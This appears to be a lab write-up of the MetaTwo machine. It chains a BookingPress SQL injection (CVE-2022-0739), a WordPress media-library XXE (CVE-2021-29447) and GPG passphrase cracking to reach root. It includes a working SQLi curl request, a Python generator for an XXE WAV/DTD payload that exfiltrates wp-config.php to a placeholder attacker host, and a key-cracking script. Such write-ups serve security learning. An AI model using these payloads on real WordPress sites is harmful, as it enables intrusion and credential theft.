Executive Summary
This executive summary gives an overview of the security vulnerabilities identified in Metatwo, specifically in the Booking Press plugin (version 1.0.10) and in WordPress core version 5.6.2, and of their subsequent exploitation, which led to unauthorized access and to the disclosure of sensitive information, including user credentials and the root password.
- Booking Press Plugin (version 1.0.10) Unauthenticated SQL Injection Vulnerability (CVE-2022-0739): A critical vulnerability, CVE-2022-0739, affects the Booking Press plugin (version 1.0.10) for WordPress. The total_service parameter of the bookingpress_front_get_category_services AJAX action (served by admin-ajax.php) is placed into a database query without sanitisation, so an unauthenticated attacker can inject SQL and read arbitrary data from the WordPress database. In this engagement it was used to dump user_login and user_pass from the wp_users table; the password hash of the “manager” account was cracked offline and the recovered password gave access to the WordPress administrative interface.
- WordPress Core version 5.6.2 XML External Entity (XXE) Vulnerability (CVE-2021-29447): WordPress core version 5.6.2 is affected by CVE-2021-29447, an XXE vulnerability in the media library. An attacker who can upload media (here, the compromised “manager” account) uploads a crafted WAV file whose iXML metadata chunk carries an external entity declaration; when WordPress parses the file's metadata the entity is resolved, and local files such as wp-config.php are read and sent to an attacker-controlled server. In this engagement the exfiltrated files yielded the credentials of the “jnelson” account, which were then used to log in via SSH.
- Privilege Escalation: Exfiltration of Passpie Private Key and Root Password Disclosure: Using the compromised “jnelson” account, the attacker retrieved the Passpie key file (.keys), which contains the GPG private key protecting the password store. The private key was converted to a crackable hash with gpg2john and its passphrase was recovered with John the Ripper by dictionary attack. With the passphrase, the Passpie database was exported in plaintext, disclosing the root password of the Metatwo system.
Payloads used to obtain loot
Booking Press plugin version 1.0.10 has an unauthenticated SQL injection vulnerability at http://metapress.htb/wp-admin/admin-ajax.php: the total_service parameter of the bookingpress_front_get_category_services action is concatenated into a database query without sanitisation. The request must carry a valid front-end nonce (_wpnonce), which is embedded in the public page that hosts the booking form (http://metapress.htb/events/ here); the nonce and the PHPSESSID cookie below are session-specific and must be refreshed before reuse. The following payload returns the username and password hash of every row in wp_users. It retrieved the hashes of both admin and manager, but only manager's hash could be cracked with our dictionary.
# Captured exploit request. Two headers from the original capture are dropped:
# a fixed Content-Length (curl computes it, so editing the payload cannot
# desynchronise the request) and Accept-Encoding (without --compressed, curl
# would print a gzip-compressed body unreadably).
curl -i -s -k -X $'POST' \
-H $'Host: metapress.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: application/json, text/plain, */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Origin: http://metapress.htb' -H $'Connection: close' -H $'Referer: http://metapress.htb/events/' \
-b $'PHPSESSID=em6lrfqsb9k6bmqn2j8lgfvhb6' \
--data-binary $'action=bookingpress_front_get_category_services&category_id=1&total_service=1) union select sleep(5),@@version,user_login,null,user_pass,null,null,null,null from wp_users-- aaa&_wpnonce=668db70df1' \
$'http://metapress.htb/wp-admin/admin-ajax.php'
WordPress version 5.6.2 has an XXE vulnerability (CVE-2021-29447) in the media library: when a WAV file is uploaded, its iXML metadata chunk is parsed as XML with external entities enabled, so a crafted file can read local files such as wp-config.php and send their contents to an attacker-controlled server. Exploitation requires an account that can upload media, which the cracked manager credentials provide. Payload generation is described at https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
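A generator for the WAV/DTD pair and a decoder for the leaked file, added here as an example; it is not the report's or wpsec's own code, but follows the payload structure described in the linked post. Assumptions: the attacker serves xxe.dtd from and receives the callback on ATTACKER_URL (a placeholder), and the target path is relative to wp-admin, the working directory of the upload handler, hence the default "../wp-config.php". SAMPLE_CONFIG is a constructed stand-in for a leaked file. The decoder handles the one thing that usually goes wrong at this step: the base64 arrives raw in the query string, so '+' must not be turned into a space.

```python
"""Generate the CVE-2021-29447 WAV/DTD pair and decode the leaked file.

Added example (not the report's or wpsec's own code). Assumptions: ATTACKER_URL
is a placeholder for the attacker's listener, the target path is relative to
wp-admin (the upload handler's working directory), and SAMPLE_CONFIG is a
constructed stand-in for the leaked file.
"""
import base64
import struct
import urllib.parse

ATTACKER_URL = "http://ATTACKER"          # placeholder, replace with your listener


def build_dtd(attacker_url: str = ATTACKER_URL,
              target: str = "../wp-config.php") -> str:
    """The external DTD: %file reads the target through php://filter (base64,
    so PHP source stays well-formed inside XML), %init defines %trick, whose
    SYSTEM URL leaks %file in the query string of a second request."""
    return (
        '<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode'
        f'/resource={target}">\n'
        f'<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM \'{attacker_url}/?p=%file;\'>" >\n'
    )


def build_wav(dtd_url: str = ATTACKER_URL + "/xxe.dtd") -> bytes:
    """Minimal RIFF/WAVE container whose only chunk is the iXML metadata that
    WordPress's ID3 parser hands to libxml; chunk and RIFF sizes are computed
    rather than hand-patched."""
    xml = (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE ANY[<!ENTITY % remote SYSTEM "{dtd_url}">%remote;%init;%trick;]>'
    ).encode()
    ixml = b"iXML" + struct.pack("<I", len(xml)) + xml
    if len(xml) % 2:                     # RIFF chunks are padded to even length
        ixml += b"\x00"
    body = b"WAVE" + ixml
    return b"RIFF" + struct.pack("<I", len(body)) + body


def parse_chunks(wav: bytes) -> dict:
    """Walk the RIFF structure; used to check the generated file is well-formed."""
    if wav[:4] != b"RIFF" or wav[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    if struct.unpack("<I", wav[4:8])[0] != len(wav) - 8:
        raise ValueError("RIFF size field does not match file length")
    chunks, pos = {}, 12
    while pos + 8 <= len(wav):
        cid = wav[pos:pos + 4].decode("ascii")
        clen = struct.unpack("<I", wav[pos + 4:pos + 8])[0]
        chunks[cid] = wav[pos + 8:pos + 8 + clen]
        pos += 8 + clen + (clen % 2)     # skip the pad byte of odd-length chunks
    return chunks


def decode_leak(request_path: str) -> str:
    """Recover the file from the '/?p=<base64>' request logged by the listener.
    libxml sends the base64 verbatim, so '+' must be kept: use unquote, not
    unquote_plus/parse_qs, which would turn '+' into a space."""
    query = urllib.parse.urlsplit(request_path).query
    value = query.split("p=", 1)[1].split("&", 1)[0]
    value = urllib.parse.unquote(value)
    value += "=" * (-len(value) % 4)     # restore padding if the log stripped it
    return base64.b64decode(value).decode(errors="replace")


# Constructed sample of a leaked file; 'ab>' sits on a 3-byte boundary so that
# its base64 ("YWI+") contains a '+', exercising the decode_leak caveat.
SAMPLE_CONFIG = b"<?php\n\ndefine('DB_PASSWORD', 'ab>');\n"
SAMPLE_CALLBACK = "/?p=" + base64.b64encode(SAMPLE_CONFIG).decode()

if __name__ == "__main__":
    with open("xxe.dtd", "w") as f:
        f.write(build_dtd())
    with open("payload.wav", "wb") as f:
        f.write(build_wav())
    print("wrote xxe.dtd and payload.wav; decoded sample:", decode_leak(SAMPLE_CALLBACK))
```

Serve the directory containing xxe.dtd (python3 -m http.server on the attacker host works for both the DTD fetch and the callback), upload payload.wav through the media library with the manager account, and paste the logged "/?p=..." request path into decode_leak.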
send_email.php contains the credentials of “jnelson”, which can be used to SSH into Metatwo.
Passpie is a password manager; on this host it stores the jnelson and root passwords. The store is encrypted with a GPG key, so seeing a password in plaintext requires the key's passphrase, which is prompted for when the database is exported: passpie export ~/passfile.txt
I log on to SFTP with jnelson's account. Because the account is not chrooted to a particular directory, I can browse the filesystem freely and download the Passpie .keys file.
The .keys file contains both the public and the private key block. Only the private key block (from -----BEGIN PGP PRIVATE KEY BLOCK----- to -----END PGP PRIVATE KEY BLOCK-----) is needed: save it to its own file, convert it to a John the Ripper hash with gpg2john, then crack the passphrase with John. Note that gpg2john prints the hash to standard output rather than taking an output filename, so redirect it; in my case the output file is privatekeyhash: gpg2john <private key file> > privatekeyhash
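The extraction-and-cracking procedure above as one script, added here as an example and not code from the original report. Assumptions: gpg2john and john are on PATH (crack() refuses to run otherwise), `john --show` prints one name:passphrase:... line per cracked hash, and SAMPLE_KEYS is a constructed .keys stand-in whose armor bodies are dummies, not real key material.

```python
"""Extract the private key from a Passpie .keys file and crack its passphrase.

Added example, not code from the original report. Assumes gpg2john and john
are on PATH and that `john --show` prints name:passphrase:... per cracked
hash. SAMPLE_KEYS is a constructed stand-in with dummy armor bodies.
"""
import re
import shutil
import subprocess
import sys
from pathlib import Path

PRIVATE_BLOCK = re.compile(
    r"-----BEGIN PGP PRIVATE KEY BLOCK-----.*?-----END PGP PRIVATE KEY BLOCK-----",
    re.S,
)


def extract_private_key(keys_text: str) -> str:
    """Return only the armored private key block from a .keys file that holds
    both the public and the private key."""
    match = PRIVATE_BLOCK.search(keys_text)
    if match is None:
        raise ValueError("no PGP private key block found")
    return match.group(0) + "\n"


def parse_john_show(show_output: str) -> dict:
    """Map key name -> passphrase from `john --show` output."""
    found = {}
    for line in show_output.splitlines():
        if ":" not in line:              # summary line, e.g. "1 password hash cracked, 0 left"
            continue
        name, passphrase = line.split(":", 2)[:2]
        found[name] = passphrase
    return found


def crack(keys_path: Path, wordlist: Path, workdir: Path) -> dict:
    """gpg2john private.key > privatekeyhash; john --wordlist=...; john --show."""
    if not (shutil.which("gpg2john") and shutil.which("john")):
        raise RuntimeError("gpg2john and john must be on PATH")
    private_key = workdir / "private.key"
    private_key.write_text(extract_private_key(keys_path.read_text()))
    hash_file = workdir / "privatekeyhash"
    # gpg2john writes the hash to stdout, so capture it into the hash file.
    result = subprocess.run(["gpg2john", str(private_key)],
                            check=True, capture_output=True)
    hash_file.write_bytes(result.stdout)
    subprocess.run(["john", f"--wordlist={wordlist}", str(hash_file)])
    shown = subprocess.run(["john", "--show", str(hash_file)],
                           capture_output=True, text=True).stdout
    return parse_john_show(shown)


# Constructed .keys stand-in: the armor bodies are placeholders, not keys.
SAMPLE_KEYS = """\
-----BEGIN PGP PUBLIC KEY BLOCK-----

mQENBFdummyPublicKeyMaterialNotARealKeyAAAA
=AbCd
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP PRIVATE KEY BLOCK-----

lQO+BFdummyPrivateKeyMaterialNotARealKeyAAAA
=EfGh
-----END PGP PRIVATE KEY BLOCK-----
"""

if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: crack_passpie.py <.keys file> <wordlist>")
    for name, passphrase in crack(Path(sys.argv[1]), Path(sys.argv[2]), Path(".")).items():
        print(f"{name}: {passphrase}")
```

With the recovered passphrase, passpie export ~/passfile.txt on the target decrypts the store and the root password can be read from the exported file.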